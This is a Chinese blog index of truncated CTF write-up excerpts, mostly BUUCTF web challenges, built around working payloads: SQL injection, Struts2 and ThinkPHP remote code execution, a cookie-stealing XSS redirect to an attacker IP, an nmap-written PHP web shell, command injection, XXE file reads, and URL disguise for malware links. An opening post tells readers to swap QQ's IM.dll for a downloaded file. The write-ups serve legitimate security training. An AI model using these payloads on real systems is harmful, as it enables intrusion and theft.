satasun的博客

首先，打开QQ所在文件的位置：将所给文件IM.dll文件复制进当前目录，替换掉原来的IM.dll：重启QQ就可以啦！文件下载链接如下：https://download.youkuaiyun.com/download/satasun/19242892

easy_sql判断注入类型（字符型注入/数字型输入）http://hwserver.bi0x.cn:8302/?id=1 and 1=1#发现是数字型注入判断字段数http://hwserver.bi0x.cn:8302/?id=1 order by 3#判断注入点http://hwserver.bi0x.cn:8302/?id=0 union select 1,2,3#1 2 3都是注入点爆库名http://hwserver.bi0x.cn:8302/?id=0 uni

概述本题是一个盲注题，可以基于布尔也可以基于时间，如果不会的话可以根据提示在网址后面加一个?tips=1降低难度成为一个基于报错的盲注。解法一：基于时间直接在前端进行注入的话没有报错回显，所以需要抓个包然后开始测试。测库名首先测试库名长度name=1'+or+if(length(database())=4,sleep(1),1)#&pass=asdasd等了3秒，我们默认是sleep1秒，但是不知道为什么睡的时间是输入的3-4倍左右，不管了，反正长度是4（1-4慢慢试）然后测试

[struts2]s2-001环境搭建Githubbuuctfpoc该漏洞因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析，然后重新填充到对应的表单数据中。例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析，所以可以直接构造 Payload 进行命令执行测试一下：exp获取Tomcat执行路径：%{@java.lang.Syste

[struts2]s2-013环境搭建githubbuuctfpocStruts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性，其值可设置为 none，get 或 all，参考官方其对应意义如下：none - 链接不包含请求的任意参数值（默认）get - 链接只包含 GET 请求中的参数和其值all - 链接包含 GET 和 POST 所有参数和其值<s:a>用来显示一个超链接，当includeParams=a

（CVE-2018-12613）环境搭建github传送门BUU传送门

[ThinkPHP]2-Rce 复现环境搭建github传送门BUU传送门POC老懒狗选择buuhttp://node3.buuoj.cn:26104/pochttp://node3.buuoj.cn:26104?s=/index/index/name/$%7B@phpinfo()%7Dexp我试了一下直接用system调用命令好像不行，可能因为中间掺杂了一些符号，这边利用eval函数进行绕过。http://node3.buuoj.cn:26104/?s=/index/index

[ThinkPHP]5.0.23-Rce环境搭建github传送门BUU传送门POC老懒狗选择直接buu，链接http://node3.buuoj.cn:27512/直接用poc打一下：POST /index.php?s=captcha HTTP/1.1Host: node3.buuoj.cn:27512Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (com

环境搭建环境搭建Github传送门BUU传送门菜鸡懒得动手直接上buu一键搭建环境http://node3.buuoj.cn:28078/POC首页已经提示thinkphp5了，笔者推荐一款比较好用的谷歌插件Wappalyzer直接分析出使用了php7.2.31（但是不懂为啥没分析出thinkPHP框架）直接百度thinkPHP任意代码执行漏洞大佬博客传送门poc：http://node3.buuoj.cn:28078/?s=index/think\app/invokefunc

[BJDCTF 2nd]xss之光御剑看了一下url，输入啥都不对。掏出御剑直接扫，扫出一个.gitGitHack安排得到：<?php$a = $_GET['yds_is_so_beautiful'];echo unserialize($a);原生类反序列化参考构造payload：<?php$a = serialize(new Exception("<script>window.location.href='IP'+document.cookie</s

[BJDCTF2020]EasySearch御剑扫一波扫到一个index.php.swp<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0

WriteUPWelcome题目地址: http://49.234.224.119:8000/题目描述： 欢迎来到极客大挑战!访问题目链接，发现405报错。百度了一下，发现是GET或者POST请求出问题了。拿Postman试一下：看了一下需要POST上传一个roam1,roam2,这两个的值不能相等，哈希值要相等，好了，传入数组。因为各种哈希都无法对数组进行操作，会返回False。然后又因为False === False => True，所以顺利绕过~在phpinfo里面找找可以

[CISCN2019 华北赛区 Day1 Web2]ikunshopping要买到lv6，然而当前页面上没有lv6，爆破页面来搞事情。import requestsurl="http://3ecc60d7-c14f-4805-9476-71bcd91747c8.node3.buuoj.cn/shop?page="for i in range(0,2000): print(i) r=requests.get( url + str(i) ) if 'lv6.png' in

[NCTF2019]True XML cookbook爆破抓包爆破，想直接爆出密码。然鹅我天真了。XXE漏洞这里存在XXE漏洞，利用脚本直接打：构造：<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE hack [<!ENTITY file SYSTEM "file:///flag">]><user> <username>&admin;</username&gt

[极客大挑战 2019]FinalSQL先骂出题人出题人是真的狗，废话不多说先放最后爆破的结果：cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfriend,flag{01d295cf-0c9c-44db-98ca-c7877

[网鼎杯 2020 朱雀组]Nmapnmap本题的考点是利用nmap的-oN写shell。nmap -oN xxx.txt先构造：' -oN w4ke.txt '返回了Host maybe down，然后访问一下w4ke.txt构造：' -oN w4ke.php <?php eval($_POST['w4ke']); ?> '返回了Hacker...fuzz了一下，发现了php被过滤，phtml可以用。于是构造：' -oN w4ke.phtml <?=

[WUSTCTF2020]朴实无华robots.txt首先拿御剑扫一下（因为buu上的docker性能不太行，扫多了就崩，所以建议用dirsearch并带上延时）。扫出了个robots.txtmdzz假flag，傻逼玩意。在响应头里面有fl4g.php.<?phpheader('Content-type:text/html;charset=utf-8');error_reporting(0);highlight_file(__file__);//level 1if (i

[安洵杯 2019]easy_serialize_php看源码对源码的一些解释已经注释在源码里了<?php$function = @$_GET['f'];function filter($img){ //这里会过滤这几个字符 $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pre

[GWCTF 2019]我有一个数据库御剑扫一波http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/robots.txthttp://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/http://12c34c82-e672-45a3-a4cb-42e05faf412d.node3.buuoj.cn/phpmyadmin/tbl_create.phphttp

[BJDCTF2020]ZJCTF，不过如此php伪协议源码如下<?phperror_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h

Docker搭建SQL注入漏洞什么是DockerDocker又被叫做容器，使用教程参考我的博客：传送门如何搭建靶场这里以ubuntu上搭建docker为例首先下载docker：apt install docker.ioapt install docker-compose如何搭建web服务器一般来说比较推荐Apache，详细教程请查看我的博客如何写php文件以一个简单的php文件为例，如果有需要请自行增加功能。<?phperror_reporting(0);

参考链接这里利用了一个不算漏洞的漏洞：浏览器在解析URL的时候默认丢掉@前面的所有东西。比如https://www.baidu.com@www.cnblogs.com/shenjuxian不注意看的话会以为是百度的，其实跳转到了另一个网站，如果黑客在后面网站上挂马的话很容易就中招啦。这里两个网址，看起来花里胡哨的，那如果后面跟一个ip呢：https://www.baidu.com@111.229.229.111看起来就稍微不那么显眼啦ip中的点还是很难受，那就将它变为纯数字，计算方式如下：

[SWPU2019]Web1这道题是个二次注入，做之前感觉挺难得，做完发现也就那么点东西。没错，还是参考了王叹之大佬的博客，神！来发广告首先以为是弱口令登录admin，试了一波BP爆破，无果。然后是SQLmap，无果。然后······是我瞎了我没看到注册······注册登录以后是一个打广告的界面：好像唯一的入口就是这个申请发布广告，看看咋回事。发现注入点点击广告详情来到了这个网页：?id=38盲猜是注入？猜测这里提取内容的语句是select * from xxx where

考点这个题目主要考的是waf绕过以及RCE。先介绍几个php函数的作用base_convert() 函数：在任意进制之间转换数字。dechex() 函数：把十进制转换为十六进制。hex2bin() 函数：把十六进制值的字符串转换为 ASCII 字符。然后是一个知识点：php中可以把函数名通过字符串的方式传递给一个变量，然后通过此变量动态调用函数例如：$function = "phpinfo";$function();WP审计源码：<?phperror_reporting(0

解题过程如下抓包进来的页面不对劲，虽然不知道什么梗但是有一说一确实丑，如果注意一下还会发现这个页面在不断刷新，先抓个包看看。发现这里上传了两个参数，分别是func和p。获取源码func猜测是function,p应该是payload（猜的），那么简单明了的东西应该是一个调用func上传的函数名，参数采用p传上来的参数。于是构造：func=file_get_contents&p=index.php源码：<?php $disable_fun = array("exec"

解题过程如下首先写脚本爆破出md5，建议采用python或者php#coding:utf-8#python3import hashlibimport timet = time.time()l = 'qwertyuiopasdfghjklzxcvbnm'for i in l: for j in l: for k in l: for m in l: for n in l:

本题思路主要是不断修改访问时候的各种请求头先抓个包进来是个登录界面，登陆进去了也没啥东西，就先试试抓包，抓出一个L0g1n.php访问L0g1n.php再次抓包这里告诉我们需要再等99年，然后考虑到那边有一个time参数，应该就是把那个time改的超过9年就行。改XFF（X-Forwarded-For）加了一堆数字，然后提示需要localhost（本地），添加一个XFF为127.0.0.1就行改Client-ip改了XFF后提示不行，那就用Client-ip试试改Refere

首先这个链接长得挺奇怪的，img参数后面跟的有点像base64编码。解码后得到MzUzNTM1MmU3MDZlNjc=这个还是base64，再次解码得到3535352e706e67这玩意看起来有点像十六进制，转一下字符串，得到555.png查看一下源码，发现有一堆base64，解成图片就是页面上的表情包。猜测img参数的作用就是将对象包含并进行转16进制再base64编码后输出，试一试包含index.phpindex.php696e6465782e706870Njk2ZTY0NjU3ODJ

这个题目主要是无参数RCE，看到题目人都傻了，看了一下大佬的博客差不多懂了。大佬博客首先用御剑扫一下，得到了Git泄露的线索。git一下得到源码：<?phpinclude "flag.php";echo "flag在哪里呢？<br>";if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';'

题目名称：WEB签到题目描述：你知道多少HTTP请求头？flag：flag{mZ3YAsfPLN1g7fTDjb1khTLgbhLG1w}WriteUp解法一：BurpSuit访问链接，得到：意思是要上传一个Cookie，变量名为cookie(大小写不一样！！)这里可以用Hackbar解决：然后返回的结果是：原来cookie要等于i_need_flag这里需要用GET请求的方式上传一个名为&=&=&的变量，直接将变量名打在url后面肯定不行的，因为&am

这是一个代码审计题：<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $con

本题可以用报错注入搞定在网页端搞太累了，直接写python利用python访问就行。import requestsurl = "http://e2c802ff-a416-42ff-9728-e95ebfa07110.node3.buuoj.cn/check.php?username=1'^extractvalue(1,concat(0x7e,(database()),0x7e))^'1&password=12123"print(requests.get(url).text)得到数据库名g

Pass-01首先，查看源码，在源码的最低端发现了这个：这个是js代码，看不懂。但是大概猜出来上传类型必须为.jpg .png .gif三者之一。这个判断是在前端的，比较好绕过。可用方法有好几种：1.下载火狐的插件，禁用前端js。（这个用处不是很多，不做介绍）2.使用BP抓包，修改文件名。3.将文件名命名为xxx.php.jpg类型绕过。先上传一张正常图片试试：上传成功，并且可以复制图片地址。复制图片地址后，在浏览器打开：这个就是我上传的图片。证明我们上传的图片名字没变，而且存放地

看了大佬的博客，勉强整出来了，详细的写一下我的思路。错误思路：观察发现是post传值，想用sqlmap一把嗦，BP抓包=>sqlmap得到数据库：web_sqli表：user字段：passwd得到密码是cdc9c819c7f8be2628d4180669009d28得到passwd以后想爆一下username：admin爆是爆出来了，没啥乱用。撞库也撞不出来，没辙了。正确思路：利用sqli的特性：在联合查询并不存在的数据时，联合查询就会构造一个虚拟的数据。说人话，上实例：

这个题目有点难，附上大佬的博客地址https://blog.youkuaiyun.com/qq_26406447/article/details/100711933以后自己也可以再次查看，详情可以看一下大佬的博客，我就不多写了~

这道题涉及到的知识点：1.data伪协议写入文件2.php://php://filter用于读取源码php://input用于执行php代码一进门就给了源码，看来是个代码审计题。<?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome t

这个题目比上次多了一点过滤，但也就一点，可以用双写绕过。这里构造oorr，因为会过滤掉中间那个or，然后语句就变为了1' or 1=1#还是没变，账号是admin。接下来开始爆字段。?username=admin&password=1'+oorrder+bbyy+1#这里输入时候的空格在url会变成加号当order by 4的时候报错，字段数为3.开始爆数据库名：?username=admin&password=1%27+ununionion+selselectect+1

WEB1.easy_php<?php highlight_file("index.php"); #高亮代码include("flag.php"); #包含flag.php文件$_aaa = "No No No"; $_bbb = "Welcome"; if($_SERVER["REQUEST_METHOD"]!="POST"){ #判断上传类型是不是POST，如果不是，就diedie("\n"."Welcome to ZJNUC

打开链接，页面提示/?ip=猜测本题的意思是让我们把这个当做变量上传参数。先输入127.0.0.1看来把我们上传的东西当做ip来执行ping操作。试试看能不能利用一下管道：?ip=127.0.0.1;dir诶，不行，dir是windows下的，说不定服务器是linux的?ip=127.0.0.1;ls出现了flag.php，那么简单的？cat flag.php走起?ip=127.0.0.1;cat flag.php嗯？过滤空格？过滤空格的解决办法如下$IFS${IFS}$I

首先查看源码，发现了Scret.php访问一下：说我们不是从https://www.Sycsecret.com访问的，那就使用python修改请求头：import requestsurl = 'http://node3.buuoj.cn:25765/Secret.php'headers={"Referer":"https://www.Sycsecret.com","Origin":"https://www.Sycsecret.com"}r = requests.get(url,headers=h